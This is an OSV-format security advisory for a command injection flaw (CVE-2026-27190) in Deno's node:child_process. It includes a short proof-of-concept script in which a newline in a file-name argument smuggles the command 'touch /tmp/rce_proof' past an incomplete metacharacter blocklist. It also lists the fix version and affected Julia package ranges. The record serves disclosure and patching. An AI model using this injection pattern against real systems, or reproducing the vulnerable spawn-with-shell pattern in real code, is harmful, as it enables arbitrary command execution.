{"id":"JLSEC-2026-116","summary":"Deno has a Command Injection via Incomplete shell metacharacter blocklist in node:child_process","details":"## Summary\n\nA command injection vulnerability exists in Deno's `node:child_process` implementation.\n\n## Reproduction\n\n```javascript\nimport { spawnSync } from \"node:child_process\";\nimport * as fs from \"node:fs\";\n\n// Cleanup\ntry { fs.unlinkSync('/tmp/rce_proof'); } catch {}\n\n// Create legitimate script\nfs.writeFileSync('/tmp/legitimate.ts', 'console.log(\"normal\");');\n\n// Malicious input with newline injection\nconst maliciousInput = `/tmp/legitimate.ts\\ntouch /tmp/rce_proof`;\n\n// Vulnerable pattern\nspawnSync(Deno.execPath(), ['run', '--allow-all', maliciousInput], {\n  shell: true,\n  encoding: 'utf-8'\n});\n\n// Verify\nconsole.log('Exploit worked:', fs.existsSync('/tmp/rce_proof'));\n```\n\nRun: `deno run --allow-all poc.mjs`\n\nThe file `/tmp/rce_proof` is created, confirming arbitrary command execution.\n\n## Mitigation\n\nAll users need to update to the patched version (Deno v2.6.8).","modified":"2026-04-14T13:31:35.469612454Z","published":"2026-04-14T13:10:46.494Z","upstream":["CVE-2026-27190","EUVD-2026-7794","GHSA-hmh4-3xvx-q5hr"],"database_specific":{"license":"CC-BY-4.0","sources":[{"imported":"2026-04-14T12:58:55.203Z","published":"2026-02-20T21:19:28.090Z","modified":"2026-03-02T13:35:52.260Z","url":"https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-27190","id":"CVE-2026-27190","html_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-27190"},{"html_url":"https://github.com/advisories/GHSA-hmh4-3xvx-q5hr","published":"2026-02-19T20:31:41Z","modified":"2026-02-20T22:20:05Z","url":"https://api.github.com/advisories/GHSA-hmh4-3xvx-q5hr","id":"GHSA-hmh4-3xvx-q5hr","imported":"2026-04-14T12:58:59.239Z"},{"html_url":"https://euvd.enisa.europa.eu/vulnerability/EUVD-2026-7794","published":"2026-02-20T20:52:11Z","modified":"2026-02-24T18:30:43Z","url":"https://euvdservices.enisa.europa.eu/api/enisaid?id=EUVD-2026-7794","id":"EUVD-2026-7794","imported":"2026-04-14T12:58:57.054Z"}]},"references":[{"type":"WEB","url":"https://github.com/denoland/deno/commit/9132ad958c83a0d0b199de12b69b877f63edab4c"},{"type":"WEB","url":"https://github.com/denoland/deno/releases/tag/v2.6.8"},{"type":"WEB","url":"https://github.com/denoland/deno/security/advisories/GHSA-hmh4-3xvx-q5hr"},{"type":"WEB","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-27190"},{"type":"WEB","url":"https://github.com/advisories/GHSA-hmh4-3xvx-q5hr"}],"affected":[{"package":{"name":"Deno_jll","ecosystem":"Julia","purl":"pkg:julia/Deno_jll?uuid=04572ae6-984a-583e-9378-9577a1c2574d"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"fixed":"2.6.10+0"}]}],"database_specific":{"source":"https://github.com/JuliaLang/SecurityAdvisories.jl/tree/generated/osv/2026/JLSEC-2026-116.json"}}],"schema_version":"1.7.5","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}],"credits":[{"name":"jackhax","contact":["https://github.com/jackhax"],"type":"REPORTER"}]}